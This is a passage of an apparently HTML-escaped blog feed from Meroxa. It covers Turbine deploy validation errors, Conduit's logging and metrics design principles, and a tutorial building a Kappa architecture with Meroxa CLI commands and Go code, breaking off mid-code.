✨ To visualize your application visit &amp;lt;https://dashboard.meroxa.io/apps/UUID/detail&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There you have it! You’ve successfully deployed from a feature branch. You can now check any downstream testing resources to see the outcomes of the changes made.&lt;/p&gt;
&lt;h2&gt;Validation errors&lt;/h2&gt;
&lt;p&gt;To protect from unintentional updates to your production data, the Meroxa Platform automatically validates resource collections referenced in your code. Here are some validation errors you may encounter as well as steps on how to resolve them.&lt;/p&gt;
&lt;h3&gt;Duplicate records validation&lt;/h3&gt;
&lt;p&gt;All destination resource collections referenced in your code are checked against Turbine data app instances already running on the Meroxa Platform. If another Turbine data app uses the same destination resource collection, the deployment process will be flagged by our validation. This is intended to prevent accidental record duplication in downstream resources:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Checking for uncommitted changes...    ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
Preparing application &quot;users-transform&quot; (javascript) for deployment...
  ✔ Application built!
  x Resource availability check failed
Error: ⚠️ Application resource &quot;pg_user&quot; with collection &quot;orders&quot; cannot be used as a destination. It is also being used as a destination by another application &quot;users&quot;.
    
Please modify your Turbine data application code. Then run `meroxa app deploy` again. To skip collection validation, run `meroxa app deploy --skip-collection-validation`.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Looping validation&lt;/h3&gt;
&lt;p&gt;If a data app references a source resource collection that is the same as the destination resource collection in the Turbine code, this will result in the deploy process failing with a resulting error. This validation prevents accidental looping effects within a single Turbine data app. This does not detect loops across multiple apps within an account.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;Checking for uncommitted changes...
  ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
  Preparing application &quot;users-transform&quot; (javascript) for deployment...
  ✔ Application built!
  x Resource availability check failed
Error: ⚠️ Application resource &quot;pg_users&quot; with collection &quot;orders&quot; cannot be used as a destination. It is also the source.

Please modify your Turbine data application code. Then run `meroxa app deploy` again. To skip collection validation, run `meroxa app deploy --skip-collection-validation`.&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is an example of how this may manifest in your code:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Skip collection validation&lt;/h3&gt;
&lt;p&gt;There are some cases where you would want to bypass the above validations and deploy the application. For these scenarios, you can run &lt;code class=&quot;language-text&quot;&gt;meroxa app deploy --skip-collection-validation&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Have questions or feedback?&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;joining our community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We can’t wait to see what you build! 🚀&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Log & Metric Experiences Matter for Streaming Data]]></title><description><![CDATA[The opportunity to delight someone using your tool can happen at any time. The open-source Conduit project team makes the user experience a top priority.]]></description><link>https://meroxa.com/blog/log-metric-experiences-matter-for-streaming-data</link><guid isPermaLink="false">https://meroxa.com/blog/log-metric-experiences-matter-for-streaming-data</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 06 Sep 2022 16:35:54 GMT</pubDate><content:encoded>&lt;p&gt;Conduit is an open-source project that will help you stream data from any of your production data stores to the places where you need it in your infrastructure. This post is about the principles around Conduit’s logging and metrics capabilities and why these principles are better for developers when moving data into systems like Apache Kafka.&lt;/p&gt;
&lt;p&gt;The opportunity to delight someone using your tool can happen at any time. While fancy web UIs or mobile apps tend to get the limelight, developer experience can apply to even the most mundane needs; logging and metrics. I’ll use logging and metrics somewhat interchangeably throughout this post but where the difference matters, I’ll make sure to call that out.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Principles&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Send everything to the same place. Create consistency and reduce the decision overhead.&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building connectors in Conduit is fairly straightforward. We made it easy for any developer that wants to build a connector to do so without having to tightly couple their work to Conduit itself. (I highly recommend you read our post on &lt;a href=&quot;https://meroxa.com/blog/how-conduit-uses-buf-to-work-with-protobuf&quot;&gt;how we use Buf to make that experience possible&lt;/a&gt;.) One of the main benefits of loose coupling is a developer can build a connector at their own pace in a separate repository. This also can lead to some potential drawbacks. The main drawback is a connector can create their own experiences that are decoupled from the main Conduit experience. In the Kafka Connect ecosystem, you can see how this plays out because logs from the connectors can be emitted anywhere they choose. Plus, you’ll be required to set any configuration for logging on a per connector basis.&lt;/p&gt;
&lt;p&gt;Conduit encourages good connector logging experiences from the get-go via the Conduit Connector SDK. The SDK has the facilities for logging built in. Arguably, a connector developer could try to emit logs to a place they choose and then use the Conduit Connector Configuration to control it but that would require more effort than going down the happy path.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/_dxBl10BfLjpfVlcY82OHh3fMQ9u-GcIjIpzxB-ZWX1LXtVgxV9JP1ZiZVc56svV09ctkvpespj9ryC-LNrg7oNzbsQnr6m0TMCHt2-hyXkaYm5qPBLTCfAn1XP2n1ieY3YmP2YpBckOL2t-ah1zSmQ&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;The Conduit Connector SDK can also bring structure to what’s being emitted on each of the log lines. Every log line will always have the same set of information in the same order. Structure and consistency are super important because developers can come to rely on the information always having the same shape. Without consistency, implicit behaviors exist within systems. Implicit behaviors in a system result in frustration for developers because work will need to be done to build around them if they’re not fully documented.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/m6-jpu5jC-CleU9YbMI0QdOedECD9b7BGEnnYq-VSJXR1w5QI4hFpSGz0hQuee2YNmyRR524rNBJhWPsz8G17pfoEsTHoSxTC76NFSMldmWHQibTEmeZUcdNhbGEi9-Ji9E8TJh_4KKDJcTSbDW-xMA&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit is even bringing this experience to Kafka Connect Connectors themselves! Conduit can run Kafka Connect Connectors via the wrapper we built and we recognize how logging can be a pain. We’re &lt;a href=&quot;https://github.com/ConduitIO/conduit-kafka-connect-wrapper/issues/56&quot;&gt;actively working to fix&lt;/a&gt; so that your Kafka Connect Connectors can emit their logs to the same place as the Conduit logs. No extra work needed!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;What are you asking the developer or operator to learn&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;One of the biggest gripes is being forced to use another tool to understand the tool that you’re supposedly trying to operate. In development, having to use another tool can be a deal breaker. In Conduit, if something needs to be communicated to the developer, we do it via the logs including the metrics. You might conclude that the Conduit logs could be overly verbose but this is where log levels are critical. The Conduit Connector SDK has facilities for marking logs at many different levels courtesy of the &lt;a href=&quot;https://github.com/rs/zerolog&quot;&gt;Zerolog package&lt;/a&gt; in Go. As the user of Conduit, you can then filter out various levels based on your needs. The benefit of all of this is that it’s text-based and any developer coming from any programming language ecosystem can quickly get the information they need to debug what’s happening.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/wegPILtBrz-DS9USEj6NvImlp5NoBBVImqf_WvhZYqyKbXgtMPPUZGgR83PeNfvJ_TW0KTNCBCbh1uXyytq-B60CKB3ozhY2GtV2MQn0KqBmhPD8Q_nCoXYiYRdXoDS2_pbdGP5TU09O59dI2Hz5E4A&quot; alt=&quot;Code snippet&quot;&gt;One of the biggest gripes the Conduit team hears from developers about Kafka Connect is that they have to use JMX to understand what’s happening under the hood. We don’t hear this from developers that have Java backgrounds, this is from developers who’s primary language isn’t Java (e.g. Javascript, Python, Go). Arguably, this disincentivizes developers from these other language ecosystems. From a Conduit perspective, all the metrics for what’s happening under the hood are emitted in a metrics endpoint (e.g. `/metrics`). Nothing fancy is needed beyond using `curl` in your terminal or a web browser. The benefit of this approach is that the developer can quickly see what’s happening on their own machines while the same API endpoint can be use to connect to data collection tools like Prometheus or Datadog.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/koCNMeCBllplpVadJ_5RbPuiMrUScz2Hm1-1_LkXIHETyGo_tKGtiT9g9Ulec_ZA-guaRhul1HgrrNYwiW3oFt4GYTPQvJtG9uJ5cb5p01YlX54SytwSeMhe986Yi_l7gybMoz7zU0JfMOAnjIM0P1U&quot; alt=&quot;Code snippet&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Principles Matter for Backend Systems&lt;/h2&gt;
&lt;p&gt;The principles outlined in the blog post are just a few the Conduit team abides by and how they’re applied specifically to metrics and logs. Principles are important because they improve decision-making not only for the team but how we guide open-source contributions in the community. Principles will also ensure consistency in the product experience across the board.&lt;/p&gt;
&lt;p&gt;Give &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; a try! If you like what you see, follow us on Twitter &lt;a href=&quot;https://twitter.com/ConduitIO&quot;&gt;@conduitIO&lt;/a&gt; or join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; to share your experiences and how we could make it better.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Analytics Using the Kappa Architecture in ~20 Lines of Code with Turbine, Materialize, Spark, & S3]]></title><description><![CDATA[Real-Time Analytics Using the Kappa Architecture in ~20 Lines of Code with Turbine, Materialize, Spark, & S3.]]></description><link>https://meroxa.com/blog/real-time-analytics-using-the-kappa-architecture-in-20-lines-of-code</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-analytics-using-the-kappa-architecture-in-20-lines-of-code</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 01 Sep 2022 20:24:55 GMT</pubDate><content:encoded>&lt;p&gt;In 2014, Jay Kreps &lt;a href=&quot;https://www.oreilly.com/radar/questioning-the-lambda-architecture/&quot;&gt;wrote a blog post&lt;/a&gt; detailing the Kappa Architecture as a way to simplify the existing Hadoop based architecture for processing data. The Kappa Architecture, as seen in the below diagram, leverages a streaming service like Apache Kafka to be the main source of data removing the need to store data into a filesystem like HDFS for batched based processing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Kappa%20Architecture%20Blog%20Post_Image%201.png&quot; alt=&quot;Kappa Architecture Blog Post_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;While the benefits of the Kappa Architecture are numerous, operating and maintaining the various infrastructure components for ingestion, streaming, stream processing, and storage is no trivial task. The Meroxa platform and our Turbine SDK make it trivial to deploy and leverage the Kappa Architecture in the below diagram in as few as 20 lines of code.&lt;/p&gt;
&lt;h2&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Kappa%20Architecture%20Blog%20Post_Image%202.png&quot; alt=&quot;Kappa Architecture Blog Post_Image 2&quot;&gt;Show Me the Code!&lt;/h2&gt;
&lt;p&gt;We’re going to bring the above diagram to life with Meroxa’s &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go&quot;&gt;Turbine Go SDK&lt;/a&gt;. Turbine currently supports writing data applications in Go, Python, and JavaScript with more languages coming soon.&lt;/p&gt;
&lt;h3&gt;Turbine Data App Requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://go.dev/dl/&quot;&gt;Go&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.16095230.999997172.1661745054-1008543787.1661745054&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/?_gl=1*1pqqhw8*_ga*MTQzMDY4NDQwOS4xNjg5MDE2ODM0*_ga_3T4DL01QGS*MTY5MzMyMjE3OS40My4xLjE2OTMzMjI2OTIuNTcuMC4w&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/?_ga=2.16095230.999997172.1661745054-1008543787.1661745054&amp;#x26;_gl=1*1thrann*_ga*NzE4NDE5MjU3LjE2NTkzMzcwOTk.*_ga_3T4DL01QGS*MTY2MTc0NTA1Mi4yNi4xLjE2NjE3NDUwNTMuMC4wLjA.&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://aws.amazon.com/s3/&quot;&gt;Amazon S3&lt;/a&gt; Bucket&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://materialize.com/docs/install/&quot;&gt;Materialize&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://spark.apache.org/&quot;&gt;Apache Spark&lt;/a&gt; (OSS) or &lt;a href=&quot;https://www.databricks.com/&quot;&gt;Databricks&lt;/a&gt; (Paid)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Adding PostgreSQL, S3, and Materialize Resources to the Data Catalog with the Meroxa CLI&lt;/h3&gt;
&lt;p&gt;The first step in creating a data app is to add the S3 and PostgreSQL resources to the Meroxa catalog. Resources can be added via the dashboard, but we’ll show you how to add them to the catalog via the CLI.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adding PostgreSQL (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \\
  --url &quot;postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB&quot; \\
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If your database supports &lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/connection-types/logical-replication&quot;&gt;logical replication&lt;/a&gt;, set the metadata configuration value to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Adding S3 (&lt;/strong&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create dl &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type s3 \\
  --url &quot;s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Adding Materialize (&lt;/strong&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-materialize&quot;&gt;docs&lt;/a&gt;&lt;strong&gt;)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Materialize is &lt;strong&gt;wire-compatible&lt;/strong&gt; with PostgreSQL, which means we can use the standard connection string format.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create mz_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type materialize \\
  --url &quot;postgres://$PG_USER@$PG_URL:$PG_PORT/$PG_DB&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Initializing a Turbine Go Data App&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init pg_kappa &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; go  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When initializing the Turbine app, you’ll see we include many comments and boilerplate to help you get up and going. We removed most of this for this example, but take a look around and even execute &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt; to see the output of our sample app.&lt;/p&gt;
&lt;h3&gt;Creating the Kappa Architecture with Turbine&lt;/h3&gt;
&lt;p&gt;Inside of the main App we can ingest the data from our PostgreSQL DB(pg_db) and orchestrate in real-time to our destinations Materialize(mz_db) and AWS S3(dl) as seen in the code block below. We’ll take data from the &lt;code class=&quot;language-text&quot;&gt;orders&lt;/code&gt; table using &lt;a href=&quot;https://en.wikipedia.org/wiki/Change_data_capture&quot;&gt;change data capture (CDC)&lt;/a&gt;. Every time there is a change in the PostgreSQL source, our Turbine data app will keep our destinations in sync.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	source&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// create connection to Postgres db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// ingest data from orders table&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    materialize&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mz_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// create connection to Materialize db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    datalake&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;dl&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// create connection to AWS S3 data lake&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; materialize&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// stream orders data to Materialize&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
